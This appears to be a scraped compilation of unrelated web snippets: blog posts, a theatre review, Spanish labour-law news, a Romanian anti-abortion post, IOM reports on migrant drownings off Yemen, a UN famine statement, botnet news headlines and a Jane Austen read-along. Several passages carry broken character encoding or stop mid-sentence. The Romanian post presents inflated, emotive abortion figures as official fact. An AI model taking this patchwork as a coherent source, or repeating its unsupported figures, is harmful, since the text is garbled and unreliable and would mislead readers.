So, in short, to the anonymous poster who offered the above comment - thank you for proving to me that this blog still has a very real role to play in promoting the welfare of dogs everywhere and that there is still ignorance and abuse to fight against.
Please feel free to comment on posts and show your support, disagree, make requests for content, promote your own links and other such things. I can't promise I won't respond but, providing they are not spam, they will be published.
|Stelmach sells out Albertans||One of the worst guarded secrets in Alberta politics was that the Alberta Teachers' Association (ATA) was planning to orchestrate a province-wide teachers' strike next spring, with the intention of having it coincide with a provincial election. |
A strike during a government's most vulnerable time - an election - has been the same strategy successfully employed by other public sector unions in the past.
|CongregaciÃ³n de Hermanas Josefinas de MÃ©xico|
JOVENâ¦ Â¿TE GUSTARIA SERVIR A
JESÃS ENTRE LOS MAS NECESITADOS
EN LA CONGREGACION DE HERMANAS JOSEFINAS?
TE INVITAMOS A COMPARTIR ESTA EXPERIENCIA CON NOSOTRAS.
LOS NIÃOS Y JÃVENES COMO TÃ, ENFERMOS Y ANCIANOS TE NECESITAN Â¡DECÃDETE!
Nuestra MisiÃ³n esta inspirada en el misterio de Nazareth teniendo como modelos a MarÃa SantÃsima y a San JosÃ© como nuestros padres y JesÃºs como esposo. Nuestra atenciÃ³n estÃ¡ dirigida a la niÃ±ez y la juventud especialmente la mÃ¡s necesitada,
Las hermanas josefinas te invitamos a vivir esta experiencia misionera en todos sectores en especial los mÃ¡s vulnerables de la sociedad en diferentes paises: MÃ©xico, Estados Unidos, Nicaragua, el Salvador, Costa Rica, Venezuela, Puerto Rico, Chile y las misiones en Angola.
|BWW Review: KILL LOCAL at La Jolla Playhouse|
Running a small business can be tough; the larger and more sophisticated entrepreneurs are crowding out the neighborhood finds. Walmart and Target are pushing out Mom and Pop grocers, Amazon is killing local independent bookstores, and those slick impersonal contract killing companies are pushing out the little guys. That's how it feels for Sheila, Abi, and their mother Gloria in this wickedly funny and unpredictable dark comedy KILL LOCAL. You see, they take pride in doing their jobs well as the third generation of this small, family run business that focuses on quality, customer service, and contract killing.
Sheila, played by Amanda Quaid is professional hired gun who knows she has the skills and the talent for her job, but does she still have the drive? Seeing an old friend from high school at a gas station has her contemplating her life, and whether she is still cut out for this life. The trouble is that this is what her talents and her temperament are perfect for, so can she become someone who is cut out for the minivan life?
The play opens with Sheila waiting for a call to come in so she can kill Todd, the guy that is hanging from a rope in a unit of his unfinished and failing condo building (a beautiful set designed by Wilson Chin). Posing as an investor, she convinced him to give her a tour, and now she's just waiting for the green light so she can do the job and then bury him in concrete.
As life, and this job, becomes more complicated for Sheila, her mother Gloria, played by CAndy Buckley, and her sister Abi, played by Xochitl Romero, appear on the scene as they try to get everything sorted. You see they are a family business and they take pride in the services they provide, and as Abi rants to Sheila at one point, "Customer service matters!"
Quaid's Sheila is both cold killer and deeply emotional. She plays both sides very well and her aggravation and her lack of forward motion in this job are relatable to anyone in a job, professional assassin or not. She shines the most when dealing with the ever increasingly frantic and funny Todd, and later in the show when she lets her character's vulnerability shine through.
As Todd, Matthew Amendt is hilariously neurotic and desperate as he uses every trick in the book to try to appeal to Sheila so she won't kill him; he begs, flirts, tries to bribe, and tells tales of a broken home and the redemption his newly discovered sibling is trying to encourage.
CAndy Buckley is a force of nature as the business minded and practical mother who took over this business from her own mother. She is imminently practical in the way of a seasoned veteran of any job; she does it well, she doesn't let it get personal, and she gets paid. Except for when she's ranting at her millennial daughters about playing with their phones, their lack of stamina for what the job require, and their inability to focus. Seriously, there are moments where this is as much a workplace comedy as it is about relationships and morality.
Abi, the younger sister played by Romero, went to Wharton so unlike her sister and mother she "doesn't do concrete"", but she is the brains behind the business paperwork, setting up security, and hacking into things. She is also hilariously on point as a frustrated customer on the receiving end of bad customer service from "Becky at Best Buy" which she says "turns her into a monster" and who can't relate to that?
Carolyn Braver rounds out this cast as the mysterious Ami, a high school student who hangs out at the building for a smoke after high school. But is there more to her story as well? Of course there is
Written by Mat Smart, a grad from the UCSD MFA program the dialogue is quick, funny, and engaging. Directed by Jackson Gay, this play maintains a suspenseful tension while also balancing the humor and the violence.
The play has some blood and gore, and the plastic sheet as a curtain is the first sign this is not your average show. For those that are squeamish or don't appreciate a Coen brothers mix of comedy and violence this may not be for you.
All of the characters in this dark comedy are richly layered, and deeply broken; it just depends on how those pieces fell to become the people they are at the time of this story. This play is dark, violent, and very funny as it explores family ties, revenge, redemption, the difficulty of change.
So you know what they say, to do good in your community you've got to eat local, shop local, watch local, and KILL LOCAL.
Photo credit: Jim Carmody/La Jolla Playhouse
|Despidos durante la baja mÃ©dica|
El Tribunal Superior de Justicia de la UniÃ³n Europea (TJUE) interpreta que una incapacidad temporal por accidente laboral puede ser considerada âdiscapacidadâ y, por lo tanto, el despido sin justa causa durante ese perÃodo podrÃa ser calificado como nulo.
|El Supremo considera discriminatorio no computar la baja maternal a efectos de retribuciÃ³n de incentivos|
El Supremo y el Constitucional seÃ±alan que el permiso de maternidad no puede ser tratado como una ausencia laboral porque supone una discriminaciÃ³n de las mujeres.
El Tribunal Supremo y el Tribunal Constitucional han fallado en sendas sentencias contra cualquier discriminaciÃ³n para la mujer por la baja maternal. El fallo del alto tribunal establece que es âdiscriminatoria y contraria a derechoâ la prÃ¡ctica empresarial consistente en computar como ausencias la baja maternal asÃ como la baja por riesgo de embarazo a los efectos de dÃas productivos para tener derecho a las retribuciones de los variados incentivos que abone la empresa a sus trabajadores por el cumplimiento de objetivos. Por su parte, el Constitucional ha amparado a una mujer que no mejorÃ³ sus condiciones laborales por estar de baja maternal cuando la empresa abriÃ³ esa oportunidad
En ambos casos, las sentencias se basan en el derecho constitucional a la igualdad y en la necesaria protecciÃ³n de la maternidad.
La Sala IV de lo Social del Supremo estima la demanda de conflicto colectivo planteada por CC OO de AndalucÃa contra la empresa Catsa, referido a sus trabajadoras en los centros de Granada y MÃ¡laga, a propÃ³sito del .
Sentencia del Constitucional
|21D, LLEGÃ LA HORA DE LAS CLÃUSULAS SUELO DE HIPOTECAS|
|SUNTEM PE PRIMUL LOC IN EUROPA!!! LA RATA AVORTURILOR... AM UCIS PESTE 20 DE MILIOANE DE SUFLETE|
Chiar daca zilnic suntem bormardati cu stiri mondene, despre cine cu cine a mai fost, chipurile, surprins, cine de cine mai divorteaza, se incearca tot mai mult distragerea atentiei noastre de la problemele de o reala importanta pentru Romania. Una dintre ele, avortul...
Si problema e ca nu avem suficienti âluptatori pentru viataâ, nu sta nimeni sa le explice mamelor caror riscuri se supun. Si riscurile fizice sunt minime, traumele psihologice in schimb, raman fara vindecare si dau nastere la adevarate traume si surse de boli pe segment emotional. La final am sa atasez un filmulet pe care as vrea sa va rog sa-l vizualizati si eventual sa-l trimiteti mai departe, e unul cu un puternic impact emotional si va spun inca d epe acum nu este genul clasic de filmulet motivational...
Conform wikispaces.com, cercetÄrile efectuate, Ã®ncepÃ¢nd cu 1993 (anul Ã®n care autoritÄÅ£ile au Ã®nceput sÄ fie preocupate de fenomen), aratÄ cÄ, Ã®n intervalul 1990-1992, avortul, Ã®n RomÃ¢nia, a atins cele mai Ã®nalte cote din Europa âÅi poate din lumeâ. ReprezentanÅ£ii mass-media, fÄrÄ sÄ se raporteze la analize credibile detaliate â ceea ce arata ca presa romÃ¢neascÄ la acest capitol este vulnerabilÄ, uÅor de intoxicat Åi manipulat â, repetÄ, pe un ton triumfalist, un slogan de genul: âRomÃ¢nia deÅ£ine recordurile la avort, la nivel mondialâ.
Dr Mihai Horga, care a ocupat funcÅ£ia de director al DirecÅ£iei de AsistenÅ£Ä FamilialÄ Åi SocialÄ Ã®n Ministerul SÄnÄtÄÅ£ii Åi Familiei, Ã®n perioada 2000-
Pornind chiar de la datele oferite de Ministerul SÄnÄtÄÅ£ii, Ã®n 1995, se vede cÄ, Ã®n perioada 1990-1992, rata avortului provocat a avut o valoare medie foarte ridicatÄ.âClinicile au fost inundate de femei care solicitau avortul. Ca o consecinÅ£Ä, rata avortului provocat legal a atins cel mai ridicat nivel din lume â aproape 200 la 1000 de femei Ã®ntre 15-44 de ani, Ã®ntre 1990-1992. Aceasta corespunde unei rate a avortului de aproape 3 avorturi provocate la fiecare nÄscut viu pentru aceeaÅi perioadÄâ. (Fragment din volumul âO viziune asupra vieÅ£iiâ, manuscrisul ed. a II, revÄzutÄ).
Iar asta se intampla acum 10 ani, de atunci acest fenomen sa nu credeti ca s-a oprit la aceste numere!
Despre cum sta treaba acum, aflam de la parintele Nicolae Tanase (caruia am sa-i aloc un articol separat pe blog, este un om care chiar merita orice pentru toata munca sa de âtaticâ pentru 400 de suflete salvate de la conditii de trai inumane, fara acces la educatie sau conditii minime de trai sau de la avort): âÃn RomÃ¢nia, Ã®notÄm Ã®n sÃ¢nge! Nu pÃ¢nÄ la glezne, nu pÃ¢nÄ la genunchi, nu pÃ¢nÄ la brÃ¢u, nu pÃ¢nÄ la gÃ¢t, ci pÃ¢nÄ peste cap! Pentru cÄ populaÅ£ia existentÄ Ã®n RomÃ¢nia acum este de 18 milioane. Åi Ã®n 20 si ceva de ani, de la moartea lui CeauÅescu Ã®ncoace, s-au omorÃ¢t 18.000.100 de copii! Aceasta este cifra oficialÄ! Este statistica oficialÄ, pentru cÄ existÄ una neoficialÄ, care aratÄ aceastÄ stare de fapt, Åi anume cÄ cifra poate sÄ fie chiar Åi dublÄ!!!â
Unde ajungem in ritmul asta!? Va las pe voi sa raspundeti si sa-mi lasati comentarii, e clar ca ceva trebuie facut si poate n-ar trebui sa stam sa mai tot asteptam de la cei care ne conduc sa faca ceva, ne-au convins ce pot de prea multe ori generatiile de politicieni indiferent de culoarea politica. Poate raspunsul este la noi, in ce putem face si ce putem schimba noi pentru tara asta.
Pentru cele dintre dvs, doamnelor, care inca sunteti nehotarate daca sa mergeti si sa faceti sau nu o intrerupere de sarcina, va spun doar atat, un copil nascut, si dat spre a adoptie are o sansa, una foarte mica, e drept pentru ca sistemul nostru e asa cum e... Dar daca ii refuzati dreptul la viata nu mai are nicio sansa! Si ca sa fiu sincer, habar n-am care sunt sansele Romaniei vorbind pe termen lung. Nu doar femeile sunt responsabile pentru intreruperile de sarcina, si partenerii, tatii poarta aceeasi vina cu atat mai mult cu cat noi nu trecem prin problemele de sorginte psihologica specifice sarcinii. Si va mai lansez o data rugamintea de a viziona filmuletul din subsolul articolului.
Pe aceasta tema, atat de importanta am sa mai revin cu un articol viitor, in care am sa fac o trecere in revista a ONG urilor care lupta impotriva avorturilor, daca stiti sau ati auzit de asemenea grupuri am sa va rog sa mi le indicati si mie, sa avem o lista completa. E bine sa stim cati âluptatori pentru viataâ avemâ¦
Insa va intreb pe dvs, care e solutia pentru acest dezastru? Ce variante credeti s-ar preta in 2014 societatii romanesti asa cum este ea pentru a diminua macar cu 15-20% numarul avorturilor in urmatorii ani?
Va multumesc si ma inclin in fata dvs!
sursa foto: deschideochiicrestine.wordpress.com, http://www.razbointrucuvant.ro/recomandari/wp-content/uploads/2012/03/avort1.jpg
|30 day gratitude challenge||I love 30 day challenges! And I don't do them often enough. (I've mentioned them previously here)|
This month, I have decided to to a 30 day gratitude challenge. It's pretty simple - for 30 days, I spend a few minutes focusing and writing on things I appreciate and for which I am grateful.
It takes only a couple of minutes every day.
For example, this morning I am grateful for:
waking up early to do a yoga class
banana-carob smoothies (I swear they taste like a decadent chocolate milkshake)
Why a gratitude challenge? Quite simply, to improve my quality of life. My mood lowers slightly this time of year, because of the cold weather and short days. For a few years, I took antidepressant medication during the winter. I know I'm not alone - many people experience a shift in their mood during winter. Sometimes, if severe. it's labeled Seasonal Affective Disorder (SAD).
Psychologically, I am in far better shape now than I was a few years ago (thanks in part to a low fat raw vegan diet). I am vulnerable to shifts in my mood, which is why during the winter I have to be extra careful to look after my physical and mental health. Maintaining a positive focus is a big part of that. This challenge is actually a segue into 30 days complaint-free, which I have set as a challenge for August.
I'm not sure what to expect after 30 days. I do notice that after I think about or write my appreciations, I feel uplifted. Even if I was already feeling happy, there's a definite shift in my mood. And somehow, life just feels easier when we're in a good mood!
|"THE FAITH TO FORGIVE" BY ANDREW WOMMACK - @david-a-mcmillen||
Luke 17:5 "And the apostles said unto the Lord, Increase our faith."
It is very interesting to note that the apostles asked Jesus to increase their faith after He spoke of forgiveness. They observed all of the wonderful miracles Jesus performed and yet that never inspired them to ask for greater faith. Truly, walking in love and forgiveness with each other takes as much faith as any miracle we will ever believe for.
The basis of forgiveness is the love and mercy of God. It is only because God first loved and forgave us that we can love and forgive others. If we aren't walking in the forgiveness of God, we won't minister it to others. He forgave us before we repented or asked for forgiveness.
The scriptures admonish us to forgive as Christ has forgiven us. God offered His forgiveness towards us while we were yet sinners. Therefore, forgiveness was offered to all unconditionally. But only those who receive the offered forgiveness through repentance and faith are received as sons of God.
Likewise, we are to forgive others their trespasses, just as God has forgiven us our trespasses. We forgive whether or not the other person repents or wants our forgiveness. But we cannot restore such a person to complete relationship until there is repentance on his part. Failure to distinguish between forgiveness and restoration with their different conditions, has caused some people to make themselves vulnerable to unscrupulous people and suffer tragic results. In marriage, we should forgive our mate for anything, even adultery. But If there is no true repentance on our mate's part, it would be foolish to trust him or her in a sexually tempting situation. We should forgive a business partner for stealing from us whether or not he repents, but that doesn't mean we ought to put ourselves in a position to let him do it again. Complete restoration is dependent on repentance. Walk in forgiveness today.
|Blu-ray Review: FEAR THE WALKING DEAD Season One|
Shock Till You Drop
Blu-ray Review: FEAR THE WALKING DEAD Season One
SHOCK reviews the first season of AMC’s FEAR THE WALKING DEAD on Blu-ray.
FEAR THE WALKING DEAD was a nice surprise.
When AMC announced that they would be birthing a flesh-ripping sibling to their flagship series THE WALKING DEAD it sorta seemed like overkill. Wasnât one epic long-form, undead apocalypse narrative enough? How much further could they go? What new humans vs. zombies arc could they possibly etch? Indeed, the idea of FEAR seemed like a case of singing the same song, albeit one performed as a cash-grabbing cover version.
Of course, if you caught the show in its initial run this past summer, you know that such cynicism was unwarranted. In fact, FEAR THE WALKING DEAD is an incredibly sophisticated, innovative show, one that takes co-creator Robert Kirkmanâs Romero-informed formula of putting people first and ghoul gore second and then steers it into new, nerve-shredding, territory.
The series dials back the clock to the early stages of the âwalkerâ outbreak, events that take place during the point in which TWDâs hero Rick Grimes (Andrew Lincoln) was locked into his coma. Instead of trotting out its horrors in the sweaty city streets and back woods of Atlanta, FEAR follows a pack of survivors living in the sun-scorched urban decay of LA, an ideal backdrop to illustrate the collapse of society. Our point of entry into the story is high school guidance counselor Madison (GONE GIRLâs Kim Dickens), a tough single mom now shacked up in a blended family with her boyfriend Travis (Cliff Curtis), daughter Alicia (Alycia Debnam-Carey) and troubled, junkie son Nick (Nick Dillane, a ringer for a young Johnny Depp). When Nick is almost killed by a ghouli-ified junkie in a squatterâs shoot-up dive, he escapes and is immediately hit by a car. Rushed to hospital, the teen tries in vain to convince his mother and others that something is wrong, though the obviously battered matriarch chalks his ravings up to his now unmanageable addictions.
Meanwhile, slowly, surely, the world starts to break down and eventually both Madison and Travis become believers. Travis breaks away to rescue his own son and ex-wife and , after a series of truly harrowing encounters with both the living dead and frenzied inner-city rioters, the clan is reunited in a military safe zone. Of course, as the âprotectedâ residents soon discover, there is no safe zone in this new world, one that propels without rule and mirrored by murder.
First of all FEAR has a radically different look. Itâs beautifully shot by Michael McDonough, every day-lit scene looking like a hazy, sun-soaked LA noir. And where THE WALKING DEAD functions as a quasi-western, FEAR THE WALKING DEAD is very much an urgent thriller. The cadence of the dialogue is snappy, the punishing electronic soundtrack by Paul Haslinger, creates an atmosphere of consistent paranoia and stress. And having a female stand as the central hero, especially one played by such an appealing and complex performer as Dickens, is a real coup and adds a kind of vulnerable gravitas to the story.
In many respects, FEAR âs first season is superior to TWDâs first two seasons in that it isnât chained to a direct source material and has the freedom to find its own legs and be its own beast, which it most certainly is. The audience never knows quite where the narrative is leading, resulting in many surprises, shocks and bizarre twists. Itâs a confident first round and moves with purpose, deftly balancing the horror of a world breaking down, with carefully ladled out doses of the expected graphic gore and KNB-fuelled zombie shock effects.
Watching the entire season on Blu-ray in a binge, as this critic did, one feels like theyâve seen a fully realized, 8-hour long feature film, one that has both closure to leave the viewer satisfied and yet has enough open ends to keep us on edge for the impending second round.
Anchor Bayâs 2 disc release looks and sounds magnificent but is virtually bereft of substantial extras of any kind, save for a double shot of EPK âmaking-ofâ talking head reels. But with all the endless press, blogging and assorted spoiler-doling found all over the internet anyway, itâs rather nice to have a simple, elegant package that leaves the art as is.
|Kostroma â Interview with Natalia V. and Maria F.|
Our in-country staff are remarkable and talented individuals. Without them, transforming the lives of vulnerable and orphaned children would not be possible. The Childrenâs HopeChest model in Russia is different than our models in other countries, in that we operate primarily through our Ministry Centers in the Kostroma, Kirov, and Vladimir regions. Our Ministry Centers
|Yemen: Another 180 migrants forced from boat today, a day after 50 Somalis, Ethiopians were drowned by smugglers off Yemen|
Source: International Organization for Migration
Country: Ethiopia, Somalia, Yemen
Aden â Up to 180 migrants are reported to have been forced from a boat today (10/08) by smugglers off the coast of Yemen. Five bodies have been recovered so far and around 50 are reported missing. This latest incident comes barely 24 hours after smugglers forced more than 120 Somali and Ethiopian migrants into the sea as they approached the coast of Shabwa, a Yemeni Governorate along the Arabian Sea resulting in the drowning of around 50 migrants. The migrants had been hoping to reach countries in the Gulf via war-torn Yemen.
Shortly after the tragedy, staff from IOM, the UN Migration Agency, found the shallow graves of 29 migrants on a beach in Shabwa, during a routine patrol. The dead had been quickly buried by those who survived the smugglerâs deadly actions. IOM is working closely with the International Committee of the Red Cross to ensure appropriate care for the deceased migrantsâ remains.
IOMâs medical staff also provided urgent care to the 27 surviving migrants, both females and males, who had remained on the beach. IOM provided initial health checks and assistance, including food, water and other emergency relief. Some of the survivors (approximately 42 in addition to the 27 survivors IOM spoke to) had already left the beach before being assisted. Twenty-two migrants are reportedly still missing and unaccounted for. The approximate average age of the passengers on the boat was 16.
"The survivors told our colleagues on the beach that the smuggler pushed them to the sea, when he saw some âauthority typesâ near the coast," explained Laurent de Boeck, the IOM Yemen Chief of Mission. "They also told us that the smuggler has already returned to Somalia to continue his business and pick up more migrants to bring to Yemen on the same route. This is shocking and inhumane. The suffering of migrants on this migration route is enormous. Too many young people pay smugglers with the false hope of a better future," continued de Boeck.
Since January 2017 to date, IOM estimates that around 55,000 migrants left the Horn of Africa to come to Yemen, most with the aim of trying to find better opportunities in the Gulf countries. More than 30,000 of those migrants are under the age of 18 from Somalia and Ethiopia, while a third are estimated to be female.
This journey is especially hazardous during the current windy season in the Indian Ocean. Smugglers are active in the Red Sea and the Gulf of Aden, offering fake promises to vulnerable migrants. IOM and its partners operate across the region to support these migrants and provide lifesaving assistance to those who find themselves abused or stranded along the route.
For more information, please contact:
|Yemen: Up to 50 Somali, Ethiopian Migrants Deliberately Drowned by Smugglers off Yemen|
Source: International Organization for Migration
Country: Ethiopia, Somalia, Yemen
Aden â Early this morning (09/08), a human smuggler, in charge of the boat, forced more than 120 Somali and Ethiopian migrants into the pitching sea as they approached the coast of Shabwa, a Yemeni Governorate along the Arabian Sea. The migrants had been hoping to reach countries in the Gulf via war-torn Yemen.
Shortly after the tragedy, staff from IOM, the UN Migration Agency, found the shallow graves of 29 migrants on a beach in Shabwa, during a routine patrol. The dead had been buried rapidly by those who survived the smugglerâs deadly actions. IOM is working closely with the International Committee of the Red Cross to ensure appropriate care for the deceased migrantsâ remains.
IOMâs medical staff also provided urgent care to the 27 surviving migrants, both females and males, who had remained on the beach. IOM provided initial health checks and assistance, including food, water and other emergency relief. Some of the survivors had already left the beach before being assisted. 22 migrants are reportedly still missing and unaccounted for. The approximate average age of the passengers on the boat was 16.
"The survivors told our colleagues on the beach that the smuggler pushed them to the sea, when he saw some âauthority typesâ near the coast," explained Laurent de Boeck, the IOM Yemen Chief of Mission. "They also told us that the smuggler has already returned to Somalia to continue his business and pick up more migrants to bring to Yemen on the same route. This is shocking and inhumane. The suffering of migrants on this migration route is enormous. Too many young people pay smugglers with the false hope of a better future," continued de Boeck.
Since January 2017 to date, IOM estimates that around 55,000 migrants left the Horn of Africa to come to Yemen, most with the aim of trying to find better opportunities in the Gulf countries. More than 30,000 of those migrants are under the age of 18 from Somalia and Ethiopia, while a third are estimated to be female.
This journey is especially hazardous during the current windy season in the Indian Ocean. Smugglers are active in the Red Sea and the Gulf of Aden, offering fake promises to vulnerable migrants. IOM and its partners operate across the region to support these migrants and provide lifesaving assistance to those who find themselves abused or stranded along the route.
For more information, please contact:
Lina Koussa at IOM Aden, Tel: +967 73 770 0120, Email: firstname.lastname@example.org
Olivia Headon at IOM HQ in Geneva, Tel: +41227179435, Email: email@example.com
|Yemen: Security Council Presidential Statement Urges Greater Humanitarian Access to Famine-Threatened Yemen, South Sudan, Somalia, Nigeria (Presidential Statement S/PRST/2017/14)|
Source: UN Security Council
Country: Nigeria, Somalia, South Sudan, Yemen
Calling upon all parties in Yemen, South Sudan, Somalia and north-east Nigeria to urgently take steps that would enable a more effective humanitarian response, the Security Council today expressed its grave concern about the unprecedented level of global humanitarian needs and the threat of famine currently facing more than 20 million people in those countries.
Issuing presidential statement S/PRST/2017/14, the Security Council deplored that in conflict-affected Yemen, South Sudan, Somalia and north-east Nigeria, certain parties had failed to ensure unfettered and sustained access for deliveries of vital food assistance, as well as other forms of humanitarian aid.
By the text, the Council reiterated its call on all parties to allow safe, timely and unhindered access to all areas and to facilitate entry for essential imports of food, fuel and medical supplies into each country and their distribution throughout. The Council further urged all parties to protect civilian infrastructure, which was critical to the delivery of humanitarian aid in the affected countries.
Stressing the need to enhance longer-term recovery and resilience of conflict-affected countries, the Council emphasized with deep concern that ongoing conflict and violence had devastating humanitarian consequences and hindered an effective humanitarian response, and were, therefore, a major cause of famine.
The Security Council noted with appreciation the Secretary-Generalâs leadership in the efforts to respond to the humanitarian crises in the four countries and asked him to continue to provide information on the humanitarian situation and response, including on the risk of famine. He was also asked to give an oral briefing in October on country-specific impediments to an effective response and to make specific recommendations on how to address those obstacles to enable a more robust short- and long-term response.
The meeting began at 10:03 a.m. and ended at 10:04 a.m.
The full text of presidential statement S/PRST/2017/14 reads as follows:
âThe Security Council expresses its grave concern about the unprecedented level of global humanitarian needs and the threat of famine presently facing more than 20 million people in Yemen, Somalia, South Sudan and north-east Nigeria, and notes with appreciation the Secretary-Generalâs leadership in the efforts to respond.
âThe Security Council notes the devastating impact on civilians of ongoing armed conflict and violence. The Security Council also emphasizes with deep concern that ongoing conflicts and violence have devastating humanitarian consequences and hinder an effective humanitarian response in the short, medium and long term and are therefore a major cause of famine in the situations above. In this regard, the Security Council also notes the links between food scarcity and increased vulnerability of women, children and persons with disabilities.
âThe Security Council reiterates its commitment to work with the Secretary-General to pursue all possible avenues to end conflicts, including through addressing their underlying root causes in an inclusive and sustainable manner.
âThe Security Council stresses that responding effectively to these crises requires respect for international humanitarian law by all parties.
âThe Security Council underlines the obligations of all parties to armed conflict to respect and protect civilians. The Security Council encourages those with influence over parties to armed conflict to remind the latter of their obligation to comply with international humanitarian law.
âThe Security Council further underlines the need to ensure the security of humanitarian operations and personnel in conflict-affected countries. The Security Council calls on all parties to respect and protect medical facilities and personnel and their means of transport and equipment.
âThe Security Council deplores that in the conflict-affected Yemen, South Sudan, Somalia and north-east Nigeria, certain parties have failed to ensure unfettered and sustained access for deliveries of vital food assistance, as well as other forms of humanitarian aid. The Security Council reiterates its calls on all parties to allow the safe, timely and unhindered access for humanitarian assistance to all areas and to facilitate access for essential imports of food, fuel and medical supplies into each country, and their distribution throughout. The Security Council further urges all parties to protect civilian infrastructure which is critical to the delivery of humanitarian aid in the affected countries.
âThe Security Council calls upon all parties in Yemen, South Sudan, Somalia and north-east Nigeria to urgently take steps that would enable a more effective humanitarian response.
âThe Security Council commends efforts by international donors to provide humanitarian assistance in response to these four crises. The Security Council calls for the immediate disbursement of the funds already pledged to Yemen, Somalia, South Sudan and north-east Nigeria at successive international conferences, including those held in Oslo, Geneva and London, if possible in the form of multi-year and unearmarked funding. The Security Council calls on Member States to provide additional resources and funding to pull people back from the brink of famine.
âThe Security Council stresses the need to enhance longer-term recovery and resilience of conflict-affected countries.
âThe Security Council requests the Secretary-General to continue to provide information on the humanitarian situation and response, including on the risk of famine, in the conflict-affected Yemen, Somalia, South Sudan and north-east Nigeria, as part of his regular comprehensive reporting.
âIn light of the unprecedented threat of famine in conflict-affected Yemen, Somalia, South Sudan and north-east Nigeria, the Security Council further requests the Secretary-General to provide an oral briefing, during the month of October 2017, on country-specific impediments to an effective response to the risk of famine in Yemen, South Sudan, Somalia and north-east Nigeria and make specific recommendations on how to address these impediments, in order to enable a more robust short- and long-term response in the four countries. The Security Council welcomes the Secretary-Generalâs letters on the risk of famine in Yemen, South Sudan, Somalia and north-east Nigeria of 21 February and 27 June 2017 and in this regard requests the Secretary-General to provide early warning when a conflict having devastating humanitarian consequences and hindering an effective humanitarian response risks leading to an outbreak of famine.
âThe Security Council expresses its readiness to continue to support the Secretary-Generalâs call to action to avert famine in conflict-affected countries and commits to engage constructively on the Secretary-Generalâs specific recommendations.â
|re: Rachel vs. Zenyatta? Dream On|
I have read that the dynamics of a match race are different from those of a regular race, because both horses will run at full throttle, regardless of threat or consequence. Therein lies the increased vulnerability.
|The thing with 0-day Java Vulnerabilities isâ¦||A few days ago, KrebsOnSecurity published a very well written article discussing a […]|
|Proxy service users download malware, unknowingly join botnet http://tco/9YGJkW2n||2012-10-09 11:20:11 - ITVulnerability : Proxy service users download malware, unknowingly join botnet http://tco/9YGJkW2n|
|Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China http://tco/gfSydpMP||2012-10-05 22:06:37 - ITVulnerability : Microsoft settles lawsuit against 3322 dot org, reveals scale of Nitol botnet in China http://tco/gfSydpMP|
|Sality botnet spotted stealthily scanning IPv4 address space for vulnerable VoIP--caught on 'network telescope': http://tco/G6M4BM7O||2012-10-05 21:17:31 - DarkReading : Sality botnet spotted stealthily scanning IPv4 address space for vulnerable VoIP--caught on 'network telescope': http://tco/G6M4BM7O|
|Microsoft settles Nitol botnet lawsuit http://tco/MhDAzRxb||2012-10-05 01:18:51 - ITVulnerability : Microsoft settles Nitol botnet lawsuit http://tco/MhDAzRxb|
|Lucrative ZeroAccess botnet enslaves one million active computers http://tco/5wVpn8c0||2012-09-21 15:06:46 - ITVulnerability : Lucrative ZeroAccess botnet enslaves one million active computers http://tco/5wVpn8c0|
|New Video's CIC News 19-09-2012: Flame, IE vuln, TDSS botnet http://tco/ZY2cxVHV||2012-09-20 19:18:26 - privelege : New Video's CIC News 19-09-2012: Flame, IE vuln, TDSS botnet http://tco/ZY2cxVHV|
|Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/0jShrzpS||2012-09-20 13:38:30 - ITVulnerability : Over 9 million PCs infected - ZeroAccess botnet uncovered http://tco/0jShrzpS|
|SSCC 98 - RSA key safety, Blackhole exploit kit updated, Nitol botnet takedown and Apache takes potshots at Microsoft http://tco/QxkeiTeQ||2012-09-18 15:29:49 - ITVulnerability : SSCC 98 - RSA key safety, Blackhole exploit kit updated, Nitol botnet takedown and Apache takes potshots at Microsoft http://tco/QxkeiTeQ|
|Week in review: Blackhole 20 is out, Windows 8 users open to Flash exploits, and botnet CCs hidden in the Tor network http://tco/x4Wr90qO||2012-09-17 18:36:55 - ITVulnerability : Week in review: Blackhole 20 is out, Windows 8 users open to Flash exploits, and botnet CCs hidden in the Tor network http://tco/x4Wr90qO|
|Emma Read-Along: Week 1 Discussion|
Welcome to Week 1 of the Emma read-along! You can learn more about the read-along schedule in this invitation post.
Today we're going to discuss chapters 1-14 (Volume I). If you came prepared, go ahead and share your thoughts in the comments section or in your own post! (Feel free to use the image above, linking back to the Emma read-along tag.) If you still have to catch up on some reading, you're welcome to check in later this week or whenever you're ready. :)
Looking forward to hearing your thoughts!
~ ~ ~
Emma Volume I: Chapters 1-14
Discussion Format: One favorite quote, some general impressions, and four questions for each week's reading.
"Vanity working on a weak head, produces every sort of mischief. Nothing so easy as for a young lady to raise her expectations too high." ~ Mr. Knightley
It's too bad Jane Austen has another book with "pride" in the title. Because I'm thinking this book might be deserving of such a title! We could call it Pride and Power or Pride and Performance. Emma does put on quite a show, doesn't she? ;)
The thing is, as much as Emma gets on my nerves now and then, I can't completely hate her character. For one thing, she displays a genuine love and protectiveness over her family (her father and sister), which we especially see during her sister's visit, when Mr. John Knightley puts Emma on edge.
She also displays rare moments of authenticity and vulnerability.
After a visit to "a poor sick family"...
These are the sights, Harriet, to do one good. How trifling they make every thing else appear!âI feel now as if I could think of nothing but these poor creatures all the rest of the day; and yet, who can say how soon it may all vanish from my mind?
(She displays real compassion to this family, we're told, and she's affected by the visit. But she also acknowledges how easy it is to move on and lose sight of the misfortune of others.)
And during her argument with Mr. Knightley about Harriet Smith and Robert Martin...
I know that such a girl as Harriet is exactly what every man delights inâwhat at once bewitches his senses and satisfies his judgment. Oh! Harriet may pick and choose. Were you, yourself, ever to marry, she is the very woman for you.
(This is in response to Mr. Knightley saying, "Better be without sense, than misapply it as you do." Perhaps I'm reading too much into Emma's reply, but I sense almost a bitterness here. She knows that Harriet has a "real, thorough sweetness of temper and manner, a very humble opinion of herself," which she feels is something men truly desire. And I think Emma is self-aware enough to realize that her character in this regard is very different than Harriet's. In fact, she even jokingly tells her little niece in Mr. Knightley's hearing, "Little Emma, grow up a better woman than your aunt. Be infinitely cleverer and not half so conceited" [emphasis mine]. I just wonder if she feels that she isn't entirely what men desire...if perhaps there's a self-consciousness and fear beneath all the logical reasons she gives for not being married.)
Emma is smart, funny, loving, and very much human, and so I like her character for these reasons. But I feel like I have a lot to learn from the very-much-human side of her that displays a LOT of pride and vanity.
A farmer can need none of my help, and is therefore in one sense as much above my notice as in every other he is below it.
How can Emma imagine she has any thing to learn herself, while Harriet is presenting such a delightful inferiority?
